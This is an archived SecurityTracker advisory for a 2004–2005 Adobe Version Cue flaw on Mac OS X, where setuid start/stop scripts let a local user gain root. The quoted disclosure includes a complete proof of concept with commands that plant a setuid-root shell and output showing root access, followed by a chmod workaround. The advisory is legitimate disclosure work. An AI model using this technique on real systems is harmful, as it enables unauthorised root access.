SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Adobe Version Cue Vendors:   Adobe Systems Incorporated
Adobe Version Cue Start/Stop Scripts Let Local Users Execute Arbitrary Code With Root Privileges
SecurityTracker Alert ID:  1012446
SecurityTracker URL:  http://securitytracker.com/id/1012446
CVE Reference:   CVE-2005-1307   (Links to External Site)
Updated:  May 21 2005
Original Entry Date:  Dec 7 2004
Impact:   Execution of arbitrary code via local system, User access via local system

Version(s): 1.0, 1.0.1
Description:   A vulnerability was reported in Adobe Version Cue on Mac OS X. A local user can obtain root privileges on the target system.

The scripts used to start and stop Adobe Version Cue are configured with set user id (setuid) root user privileges and do not validate the path names.

A local user can create specially crafted scripts and modify the current path to point to the directory containing those scripts. Then, when Adobe Version Cue is started or stopped, the scripts will run with root user privileges.

Jonathan Bringhurst reported this vulnerability.

Impact:   A local user can execute arbitrary code with root privileges on the target system.
Solution:   No vendor solution was available at the time of this entry.

The author of the report has provided the following temporary workaround (which may disable some Adobe Version Cue functions):

'sudo chmod 0755 /Applications/Adobe\ Version\ Cue/stopserver.sh'
'sudo chmod 0755 /Applications/Adobe\ Version\ Cue/startserver.sh'

Vendor URL:  www.adobe.com/products/creativesuite/versioncue.html (Links to External Site)
Cause:   State error
Underlying OS:  UNIX (macOS/OS X)
Underlying OS Comments:  10.3.6

Message History:   This archive entry has one or more follow-up message(s) listed below.
May 21 2005 (Exploit is Available) Adobe Version Cue Start/Stop Scripts Let Local Users Execute Arbitrary Code With Root Privileges
Some demonstration exploit code is available.
May 21 2005 (Vendor Issues Fix) Adobe Version Cue Start/Stop Scripts Let Local Users Execute Arbitrary Code With Root Privileges
The vendor has issued a fix.



 Source Message Contents

Subject:  Local root exploit on Mac OS X with Adobe Version Cue


Note: Sorry if this is a dupe, I might of sent it to the wrong address.

Local root exploit on Mac OS X 10.3.6 with Adobe products installed
Found by Jonathan Bringhurst <fintler@gmail.com.NOSPAM>

Summary:

It's possible to create a suid root shell with a non-privileged user
on a Mac OS X 10.3.6 system with Adobe Version Cue installed. Adobe
Version Cue is installed by default with virtually every recent Adobe
product. This most likely affects many versions of Mac OS X and Adobe
Version Cue.

Details:

Scripts to start and stop Adobe Version Cue are suid root and do not
make any checks to see if they are running from the correct path. By
setting the current path to a controlled directory and creating
scripts with specific names, a user can have a custom script run euid
root.

Proof of concept:

haven:~ fintler$ cd ~
haven:~ fintler$ id
uid=502(fintler) gid=500(fintler) groups=500(fintler)
haven:~ fintler$ echo "cp /bin/sh /Users/$USER;chmod 4755
/Users/$USER/sh;chown root /Users/$USER/sh" > productname.sh
haven:~ fintler$ chmod 0755 ./productname.sh
haven:~ fintler$ ln -s /Applications/Adobe\ Version\ Cue/stopserver.sh .
haven:~ fintler$ ./stopserver.sh
Stopping  ...

./stopserver.sh: line 21: ./tomcat/bin/shutdown.sh: No such file or directory
No matching processes belonging to you were found
haven:~ fintler$ ./sh
sh-2.05b# id
uid=502(fintler) euid=0(root) gid=500(fintler) groups=500(fintler)
sh-2.05b# whoami
root
sh-2.05b#

Work Around:

The following may disable aspects of Adobe Version Cue but should
temporarily fix the issue until a more permanent solution is released
from Adobe:
'sudo chmod 0755 /Applications/Adobe\ Version\ Cue/stopserver.sh'
'sudo chmod 0755 /Applications/Adobe\ Version\ Cue/startserver.sh'

EOF

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC